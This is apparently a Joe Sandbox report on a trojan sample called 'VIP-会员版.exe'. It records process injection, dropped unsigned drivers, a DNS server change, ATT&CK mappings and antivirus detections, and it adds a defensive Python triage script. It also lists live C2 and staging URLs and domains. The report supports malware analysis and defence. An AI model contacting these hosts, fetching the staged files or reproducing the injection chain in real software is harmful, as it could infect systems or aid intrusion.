Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_6A6D3430 RDTP,GetFileAttributesA,MessageBoxA,__wfopen_s,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,__wfopen_s,OutputDebugStringA,OutputDebugStringA,CreateFileA,OutputDebugStringA,OutputDebugStringA,GetFileSize,_malloc,ReadFile,CloseHandle,_malloc,_memset,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,__wfopen_s,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA
Source: 22FD558C8.sys.2.dr Static PE information: Found potential injection code
Source: D74384F.sys.2.dr Static PE information: Found potential injection code
Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe Memory written: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe Memory written: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 400000
Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe Memory written: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 1754000
Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe Memory written: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 2C2D000
Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe Memory written: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 2C2E000
Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe Process created: C:\Program Files (x86)\Google\D74384FB8D2C9.exe "C:\Program Files (x86)\google\D74384FB8D2C9.exe" WfCSiyl7KCmSL4J0fXwpklp7KYEqfR6ShFd+QzmL6nTfLzmL6+rr5jmL5ejq5jx7JntO
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_0BE96404 GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_0BE96D4C GetLocaleInfoA
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_0BE9E594 GetLocaleInfoA
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_0BE9E548 GetLocaleInfoA
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_0BE9650F lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_0BE9FB64 GetLocaleInfoA,GetACP
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_6A6EF35B _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_6A7111F0 GetLocaleInfoA
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_0044CEC4 _strcpy_s,GetLocaleInfoA,__snwprintf_s
Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation (26 times)
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation (15 times)
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation (3 times)
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation (2 times)
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation (1 time)
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation (1 time)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (6 times)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4 times)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (3 times)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation (1 time)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation (2 times)
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_0BE9CFD4 GetLocalTime
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_0BE96E15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId

      Stealing of Sensitive Information

Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Registry value created: 8.8.8.8,114.114.114.114
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Registry value created: 8.8.8.8,114.114.114.114
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_0BEF3958 ks_unbind
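Three things in this report are what a responder pulls out first: the thread sleeps that exceed the sandbox's 30000 limit, the MZ image written into D74384FB8D2C9.exe together with the VirtualAllocEx / WriteProcessMemory / CreateRemoteThread chain in the HIPS section, and the registry value holding 8.8.8.8,114.114.114.114. The script below is an added example written for this page; it is not code from the Joe Sandbox report or from Joe Sandbox itself. It parses signature lines in the report's plain-text layout (source on the left, event text on the right) and raises those findings. The sample lines are constructed from this report. Two assumptions are made and marked in the code: the "s"-suffixed sleep values are treated as milliseconds (so -30000s is the 30 s observation window), and any comma-separated IPv4 registry value is treated as a DNS server candidate, because the report does not show the key name.

```python
import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: lines copied from the report above. The first line keeps
# the run-together form of the exported page, the others have a space.
SAMPLE = r"""Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory allocated: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe Memory written: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_6A6E01F0 OutputDebugStringA,OutputDebugStringA,VirtualAllocEx,WriteProcessMemory,VirtualFreeEx,CloseHandle,GetModuleHandleA,GetProcAddress,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,2_2_6A6E01F0
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 4308 Thread sleep time: -3973000s >= -30000s
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 4308 Thread sleep time: -5251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5960 Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Registry value created: 8.8.8.8,114.114.114.114
"""

# The event keyword splits the source path from the event text; the lazy
# source match accepts both "...exe Memory written" and "...exeMemory written".
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*"
    r"(?P<event>Memory allocated|Memory written|Code function|Registry value created|TID):\s*"
    r"(?P<rest>.*?)\s*$")
WRITE_RE = re.compile(r"^(?P<target>.*?) base: (?P<base>[0-9A-Fa-f]+)"
                      r"(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$")
# Assumption: the report's "s"-suffixed sleep values are milliseconds, so the
# -30000 limit printed in every sleep line is the sandbox's 30 s window.
SLEEP_RE = re.compile(r"^(?P<tid>\d+)\s*Thread sleep time: -(?P<ms>\d+)s >= -\d+s$")
FID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]+$")  # function ids such as 2_2_6A6E01F0
INJECT_CHAIN = ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")


@dataclass
class Finding:
    kind: str
    source: str
    detail: str


def parse_events(report_text):
    """Yield (source, event, rest) for every recognised signature line."""
    for line in report_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m["src"], m["event"], m["rest"]


def ordered_subsequence(apis, wanted):
    """True if every API in `wanted` occurs in `apis`, in that order."""
    pos = 0
    for api in apis:
        if api == wanted[pos]:
            pos += 1
            if pos == len(wanted):
                return True
    return False


def parse_ipv4_list(value):
    """Addresses in a comma-separated value, or [] if any part is not IPv4."""
    try:
        return [str(ipaddress.IPv4Address(p.strip())) for p in value.split(",")]
    except ValueError:
        return []


def sleep_totals(report_text):
    """Total reported sleep in milliseconds per (source, thread id)."""
    totals = defaultdict(int)
    for src, event, rest in parse_events(report_text):
        s = SLEEP_RE.match(rest) if event == "TID" else None
        if s:
            totals[(src, s["tid"])] += int(s["ms"])
    return dict(totals)


def triage(report_text, sleep_limit_ms=30_000):
    findings = []
    for src, event, rest in parse_events(report_text):
        if event == "Memory written":
            w = WRITE_RE.match(rest)
            # An MZ header written into another process's memory is a PE injection.
            if w and w["target"] != src and (w["magic"] or "").upper().startswith("4D5A"):
                findings.append(Finding("pe_injection", src,
                                        f"MZ image written into {w['target']} at 0x{w['base']}"))
        elif event == "Code function":
            tokens = [t for t in re.split(r"[ ,]+", rest) if t]
            fid = next((t for t in tokens if FID_RE.match(t)), "?")
            apis = [t for t in tokens if not FID_RE.match(t)]
            if ordered_subsequence(apis, INJECT_CHAIN):
                findings.append(Finding("remote_thread_chain", src,
                                        f"{fid}: {' -> '.join(INJECT_CHAIN)}"))
        elif event == "Registry value created":
            # Assumption: the report omits the key name; a comma-separated IPv4
            # list is the NameServer value format, so flag it as a DNS candidate.
            servers = parse_ipv4_list(rest)
            if servers:
                findings.append(Finding("dns_servers", src, ",".join(servers)))
    for (src, tid), total in sleep_totals(report_text).items():
        if total >= sleep_limit_ms:
            findings.append(Finding("long_sleep", src, f"TID {tid} slept {total // 1000} s in total"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"[{f.kind}] {f.source}: {f.detail}")
```

Run as a script it prints the findings for the embedded sample; pass the signature section of any report to triage() for real use. On these lines thread 4308 sleeps for 9224 s in total, more than two and a half hours, which is why a sandbox without sleep patching would time out long before the driver drop and DNS change that this report still captured, and why the injection finding (MZ header at base 400000 in D74384FB8D2C9.exe plus the remote-thread chain in 2_2_6A6E01F0) is worth a dedicated memory dump of the target process rather than just the parent.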
MITRE ATT&CK Matrix (techniques with matching signatures; the leading number is the count of signatures mapped to that technique)

Execution: 3 Native API; 2 Command and Scripting Interpreter; 2 Service Execution
Persistence: 1 DLL Side-Loading; 32 Windows Service
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 32 Windows Service; 511 Process Injection
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 22 Masquerading; 1 Modify Registry; 3 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 511 Process Injection
Credential Access: 1 Credential API Hooking; 21 Input Capture
Discovery: 1 System Time Discovery; 4 File and Directory Discovery; 235 System Information Discovery; 561 Security Software Discovery; 3 Virtualization/Sandbox Evasion; 2 Process Discovery; 11 Application Window Discovery; 1 Remote System Discovery
Collection: 1 Archive Collected Data; 1 Screen Capture; 1 Credential API Hooking; 21 Input Capture
Command and Control: 5 Ingress Tool Transfer; 2 Encrypted Channel; 11 Non-Standard Port; 4 Non-Application Layer Protocol; 14 Application Layer Protocol
Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact: no matching signatures
Behavior Graph (ID 1569132; sample VIP-#U4f1a#U5458#U7248.exe; start date 05/12/2024; architecture Windows; score 100). Numbers after a process name are the graph's per-process counters (created registry values and created files).

Start node: www.wshifen.com, www.sogou.com, 13 other IPs or domains. Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 15 other signatures.

VIP-#U4f1a#U5458#U7248.exe (2), started from the start node: dropped C:\Program Files (x86)\...\D74384FB8D2C9.exe (PE32). Signatures: Antivirus detection for dropped file; Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Machine Learning detection for dropped file; 5 other signatures. Starts D74384FB8D2C9.exe.

svchost.exe (1 1), started from the start node: 127.0.0.1 unknown unknown.

D74384FB8D2C9.exe (16 103), started by VIP-#U4f1a#U5458#U7248.exe:
  Network: 114.114.114.114 (ports 49722, 49730, 49784; COGENT-174US; China); shoufeifz.qijianfz.com 119.28.131.242 (ports 49715, 80; TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN; China); 13 other IPs or domains.
  Dropped: C:\Windows\SysWOW64\22FD558C8.sys (PE32+); C:\Windows\D74384F.sys (PE32+); C:\Users\user\...\VIP-#U4f1a#U5458#U7248.exe (PE32); 17 other malicious files.
  Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Modifies the DNS server; Sample is not signed and drops a device driver.

Source | Detection | Scanner | Label
VIP-#U4f1a#U5458#U7248.exe | 53% | ReversingLabs | Win32.Trojan.Giant
VIP-#U4f1a#U5458#U7248.exe | 100% | Avira | HEUR/AGEN.1315452
VIP-#U4f1a#U5458#U7248.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll | 100% | Avira | TR/Inject.zdewt
C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | 100% | Avira | HEUR/AGEN.1315452
C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll | 100% | Avira | HEUR/AGEN.1328196
C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dll | 100% | Avira | HEUR/AGEN.1328190
C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dll | 100% | Avira | HEUR/AGEN.1328190
C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\D74384FB8D2C9.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\CFA702\D2EDCA7E\BCF54838A16\FC14NMPKD.dll | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\CFA702\D2EDCA7E\E03C4D\8FD7ijlhc.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\CFA702\GD085C\5801srmps.dll | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\CFA702\D2EDCA7E\CCDF613EA366\5B38DA6A8.dll | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\CFA702\D2EDCA7E\B790E0\A2F0jleks.dll | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dll | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\CFA702\D2EDCA7E\H4B6E7061C\E875FIB50.dll | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dll | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\D74384FB8D2C9.exe | 13% | ReversingLabs |
C:\Users\user\Desktop\CFA702\AB67019A2010\346DgjhcV.dll | 0% | ReversingLabs |
C:\Users\user\Desktop\CFA702\C39C3E72B\4509OKKGD.dll | 0% | ReversingLabs |
C:\Users\user\Desktop\CFA702\D2EDCA7E\A806AE3\9683JE76z.dll | 0% | ReversingLabs |
C:\Users\user\Desktop\CFA702\D2EDCA7E\B2A26198\8C1AXUVPO.dll | 0% | ReversingLabs |
C:\Users\user\Desktop\CFA702\D2EDCA7E\B790E0\A2F0jleks.dll | 75% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\CFA702\D2EDCA7E\BCF54838A16\FC14NMPKD.dll | 58% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\CFA702\D2EDCA7E\CCDF613EA366\5B38DA6A8.dll | 67% | ReversingLabs | Win32.Trojan.Occamy
C:\Users\user\Desktop\CFA702\D2EDCA7E\CF3651B90\C945E611y.dll | 7% | ReversingLabs |
C:\Users\user\Desktop\CFA702\D2EDCA7E\E03C4D\8FD7ijlhc.exe | 35% | ReversingLabs |
C:\Users\user\Desktop\CFA702\D2EDCA7E\H4B6E7061C\E875FIB50.dll | 54% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\CFA702\D2EDCA7E\IB88701\B81BTTTQM.dll | 5% | ReversingLabs |
C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll | 61% | ReversingLabs | Win32.PUA.Presenoker
C:\Users\user\Desktop\CFA702\FACCB296\21AAtnoki.dll | 0% | ReversingLabs |
C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll | 85% | ReversingLabs | Win32.Trojan.CredentialAccess
C:\Users\user\Desktop\CFA702\GD085C\5801srmps.dll | 54% | ReversingLabs | Win32.Trojan.Tnega
C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dll | 78% | ReversingLabs | Win32.Backdoor.Zapchast
C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dll | 78% | ReversingLabs | Win32.Backdoor.Zapchast
C:\Windows\D74384F.sys | 62% | ReversingLabs | Win64.PUA.Creprote
C:\Windows\SysWOW64\22FD558C8.sys | 62% | ReversingLabs | Win64.PUA.Creprote
      No Antivirus matches
      No Antivirus matches
URLs scanned (every row below scored 0% by Avira URL Cloud with label "safe", so scanner and score are given once rather than per row)

Many of these strings are raw memory extractions rather than complete URLs. The `/d?dn=<name>` requests to 119.29.29.29, 182.254.116.116 and 114.114.114.114 are HTTPDNS-style lookups issued over plain HTTP, which means the sample resolves its staging hosts (sinastorage.cn, sinastorage.com, sinacloud.net) without going through the system resolver; the characters fused after the queried name (for example `183.60.95.221`, which the domain table below lists as the address of sinastorage.cn, or `49.7.37.97`) are neighbouring memory contents. The "safe" verdict is a reputation lookup on the URL string and says nothing about what the sample does with these hosts.

http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97K
http://119.29.29.29/d?dn=Tgd
http://shoufeifz.qijianfz.com/C:
http://119.29.29.29/d?dn=sinastorage.cn49.7.37.97d
http://cqbox.applinzi.com/time.phphttp://cqbox.sinaapp.com/time.phphttp://cqbox.appchizi.com/time.ph
http://114.114.114.114/d?dn=fd
http://114.114.114.114/d?dn=sinastorage.cnYwY
http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.phpupl
http://114.114.114.114/d?dn=sinastorage.cn&PZ)
http://cqbox.applinzi.com/time.php
http://114.114.114.114/d?dn=sinastorage.com5w%
http://182.254.116.116/-
http://www.ksfm2.com
http://119.29.29.29/d?dn=BUS
http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&1
https://waigua.lanzn.com/b015nykdcss
http://182.254.116.116/d?dn=cd
http://182.254.116.116/d?dn=sinastorage.comC:
http://182.254.116.116/d?dn=sinacloud.net?dn=sinastorage.cn
http://shoufeifz.qijianfz.com/d497ea
http://119.29.29.29/d?dn=sinastorage.com183.60.95.221
http://182.254.116.116/d?dn=sinastorage.cnMwm
http://182.254.116.116/d?dn=sinastorage.cn-w
http://shoufeifz.qijianfz.com/f
http://crl.ver)
http://119.29.29.29/d?dn=sinacloud.net.de5
http://shoufeifz.qijianfz.com/style.css)
http://182.254.116.116/d?dn=sinacloud.net5w%
https://www.90yundian.com/liebiao/8115018243F766D7
http://www.GeeM2.com
http://114.114.114.114/d?dn=sinacloud.net~p
http://shoufeifz.qijianfz.com/Z
http://shoufeifz.qijianfz.com/tyle.css1Yd
http://shoufeifz.qijianfz.com/r
http://www.Haom6.comhttp://www.GeeM2.comWemade
http://182.254.116.116/d?dn=dd
http://shoufeifz.qijianfz.com/q
http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&
http://www.m6dlq.com/
http://shoufeifz.qijianfz.com/
http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97-
http://182.254.116.116/d
http://shoufeifz.qijianfz.com/style.cssR
http://shoufeifz.qijianfz.com/style.css
http://119.29.29.29/d?dn=sinastorage.cn49.7.37.97
http://114.114.114.114/d?dn=sinastorage.cnyp
http://114.114.114.114/d?dn=sinastorage.com&
http://182.254.116.116/d?dn=sinastorage.comwuj
http://114.114.114.114/c
http://182.254.116.116/d?dn=sinacloud.net
http://114.114.114.114/d?dn=sinastorage.comstio
http://182.254.116.116/d?dn=sinacloud.net-w
http://shoufeifz.qijianfz.com/y
http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97?
http://119.29.29.29/d?dn=
http://119.29.29.29/d?dn=sinastorage.cn
http://119.29.29.29/d?dn=sinacloud.net.net
http://www.GameM2.com
https://waigua.lanzn.com/b015nykd
http://182.254.116.116/d?dn=sinastorage.com
http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.php
http://182.254.116.116/d?dn=sinastorage.cniw
http://182.254.116.116/d?dn=sinacloud.netm
http://119.29.29.29/d?dn
http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&x
http://182.254.116.116/d?dn=sinastorage.cnLMEMXH;
http://182.254.116.116/d?dn=sinastorage.com&
http://114.114.114.114/d?dn=sinacloud.net88701
http://182.254.116.116/d?dn=sinastorage.cn
http://114.114.114.114/d?dn=cd
http://114.114.114.114/d?dn=sinastorage.cn&BZ?
http://www.8pkw.com:5566/kss_api/io.php
http://www.m6dlq.com/PEC2
http://119.29.29.29/d?dn=sinastorage.com14$
http://www.8pkw.com:5566/kss_api/api.php_ksreg_http://www2.8pkw.com/kss_api/api.php_ksreg_13_ksreg_1
https://waigua.lanzn.com/b015nykdK
http://119.29.29)
http://119.29.29.29/d?dn=sinacloud.net
http://119.29.29.29/d?dn=sinastorage.comn
http://114.114.114.114/d?dn=sinastorage.comfZ
http://plugin.config.hyocr.com:8080/hyver.php?ver=%d&user=%s
http://182.254.116.116/d?dn=sinacloud.netmAE3
http://182.254.116.116/d?dn=sinacloud.netn4
Domains (no antivirus detection is listed for any of them)

Name | IP | Active | Malicious | Reputation
sinacloud.net | 27.221.16.149 | true | false | high
sinastorage.cn | 183.60.95.221 | true | false | high
www.8pkw.com | 43.154.56.182 | true | false | unknown
shoufeifz.qijianfz.com | 119.28.131.242 | true | false | unknown
www.wshifen.com | 103.235.46.96 | true | false | high
sinastorage.com | 123.126.45.208 | true | false | high
so.seos-lb.com | 104.192.110.226 | true | false | high
www.sogou.com | 43.153.236.147 | true | false | high
ww1.sinaimg.cn.w.alikunlun.com | 163.181.92.233 | true | false | high
www.iqiyi.com | unknown | unknown | false | high
www.sina.com.cn | unknown | unknown | false | high
www.so.com | unknown | unknown | false | high
www.baidu.com | unknown | unknown | false | high
URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.sina.com.cn/ | false | - | high
http://sinastorage.cn/question/s6paies | false | - | high
http://sinastorage.cn/question/data.txt | false | - | high
http://shoufeifz.qijianfz.com/ | false | Avira URL Cloud: safe | unknown
http://shoufeifz.qijianfz.com/style.css | false | Avira URL Cloud: safe | unknown
http://sinastorage.cn/question/l6tbasser.zip | false | - | high
http://sinacloud.net/question/data.txt | false | - | high
http://sinastorage.com/question/o6saettr.zip | false | - | high
http://sinastorage.com/question/c6tmassa | false | - | high
http://sinacloud.net/question/2024-12-05/21_22 | false | - | high
http://sinastorage.com/question/2024-12-05/21_22 | false | - | high

The reputation column scores the hosting domain, and the Sina cloud storage domains (sinastorage.cn, sinastorage.com, sinacloud.net) score "high" because they serve large amounts of legitimate content. It says nothing about the `/question/...` paths, including the `.zip` archives and the dated `2024-12-05/21_22` directory, which are referenced only from this sample's memory and should be treated as sample-specific indicators regardless of the domain score.
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97KD74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://cqbox.applinzi.com/time.phpVIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://114.114.114.114/d?dn=fdD74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://sinacloud.net/question/VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                    high
                                                    http://119.29.29.29/d?dn=sinastorage.cn49.7.37.97dD74384FB8D2C9.exe, 00000002.00000003.2842042739.0000000005634000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2842244916.000000000563A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://114.114.114.114/d?dn=sinastorage.cn&PZ)D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB9B000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://shoufeifz.qijianfz.com/C:D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D44000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007D44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://119.29.29.29/d?dn=TgdD74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://114.114.114.114/d?dn=sinastorage.cnYwYD74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://cqbox.applinzi.com/time.phphttp://cqbox.sinaapp.com/time.phphttp://cqbox.appchizi.com/time.phVIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://sinacloud.net/question/http://sinastorage.cn/question/http://sinastorage.com/question/http://VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                      high
                                                      http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.phpuplB81BTTTQM.dll.2.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://114.114.114.114/d?dn=sinastorage.com5w%D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://182.254.116.116/-D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
